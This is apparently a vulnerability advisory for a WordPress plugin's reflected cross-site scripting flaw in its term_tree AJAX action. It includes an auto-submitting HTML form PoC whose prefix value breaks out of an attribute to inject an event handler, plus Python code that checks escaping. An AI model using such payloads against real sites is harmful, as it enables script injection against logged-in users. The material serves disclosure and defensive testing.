The plugin does not escape the prefix parameter before outputting it back in an attribute when handling the term_tree AJAX action (available to any authenticated user), leading to a Reflected Cross-Site Scripting issue.
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
<input type="hidden" name="action" value="term_tree" />
<input type="hidden" name="prefix" value='xxxxxx" onmouseover=alert(/XSS/) test="' />
<input type="hidden" name="name" value="Uncategorizedory" />
<input type="hidden" name="widget_id" value="1" />
<input type="hidden" name="id" value="2" />
<input type="submit" value="Submit request" />
</form>
<script>
// Submit the form as soon as the page loads
var form1 = document.getElementById('hack');
form1.submit();
</script>
</body>
</html>
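The missing attribute escaping described above, as an added example that is not the plugin's code: it renders the PoC's prefix value into a hypothetical `<ul id="...">` template (the page does not show the plugin's real markup), with and without attribute-context escaping, then parses the result to list attributes the template never meant to emit. Python's `html.escape(..., quote=True)` stands in for the WordPress `esc_attr()` helper.

```python
from html import escape
from html.parser import HTMLParser

# Constructed sample input: the prefix value from the PoC form above.
POC_PREFIX = 'xxxxxx" onmouseover=alert(/XSS/) test="'

# Hypothetical template; the only attributes it intends to emit are id and class.
TEMPLATE = '<ul id="%s-tree" class="term-tree"></ul>'


def render_unsafe(prefix):
    """Echo the prefix into the attribute unescaped (the behaviour described)."""
    return TEMPLATE % prefix


def render_escaped(prefix):
    """Escape for an attribute context: &, <, > and both quote characters."""
    return TEMPLATE % escape(prefix, quote=True)


class _AttrCollector(HTMLParser):
    """Collect (tag, {attribute: value}) for every start tag in the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parsed_attributes(markup):
    """Parse markup the way an HTML tokenizer would and return its start tags."""
    collector = _AttrCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def injected_attributes(markup, expected=("id", "class")):
    """Return the names of attributes the template did not intend to emit."""
    extra = []
    for _tag, attrs in parsed_attributes(markup):
        extra.extend(name for name in attrs if name not in expected)
    return sorted(extra)


if __name__ == "__main__":
    for render in (render_unsafe, render_escaped):
        html_out = render(POC_PREFIX)
        print(render.__name__, "->", html_out)
        print("  unexpected attributes:", injected_attributes(html_out))
```

The same check can run as a regression test against the real response body once the fix is in place, with `expected` set to the attributes the plugin's markup actually uses.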